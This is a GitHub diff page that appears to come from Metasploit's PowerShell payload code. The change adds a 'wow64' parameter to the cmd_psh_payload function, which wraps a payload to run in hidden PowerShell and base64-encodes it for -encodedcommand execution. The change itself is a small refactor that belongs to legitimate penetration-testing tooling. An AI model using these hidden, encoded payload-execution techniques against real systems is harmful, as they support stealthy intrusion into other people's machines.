File tree Expand file tree Collapse file tree 1 file changed +2
-2
lines changed Expand file tree Collapse file tree 1 file changed +2
-2
lines changed Original file line number Diff line number Diff line change @@ -131,7 +131,7 @@ def run_hidden_psh(ps_code,ps_bin='powershell.exe')
131131 #
132132 # Creates cmd script to execute psh payload
133133 #
134- def cmd_psh_payload ( pay , old_psh = datastore [ 'PSH_OLD_METHOD' ] )
134+ def cmd_psh_payload ( pay , old_psh = datastore [ 'PSH_OLD_METHOD' ] , wow64 = datastore [ 'RUN_WOW64' ] )
135135 # Allow powershell 1.0 format
136136 if old_psh
137137 psh_payload = Msf ::Util ::EXE . to_win32pe_psh ( framework , pay )
@@ -146,7 +146,7 @@ def cmd_psh_payload(pay, old_psh=datastore['PSH_OLD_METHOD'])
146146 psh_payload << "while(1){Start-Sleep -s #{ sleep_time } #{ fun_name }
147147 end
148148 # Determine appropriate architecture
149- ps_bin = datastore [ 'RUN_WOW64' ] ? '$env:windir\syswow64\WindowsPowerShell\v1.0\powershell.exe' : 'powershell.exe'
149+ ps_bin = wow64 ? '$env:windir\syswow64\WindowsPowerShell\v1.0\powershell.exe' : 'powershell.exe'
150150 # Wrap in hidden runtime
151151 psh_payload = run_hidden_psh ( psh_payload , ps_bin )
152152 # Convert to base64 for -encodedcommand execution
You can’t perform that action at this time.
0 commit comments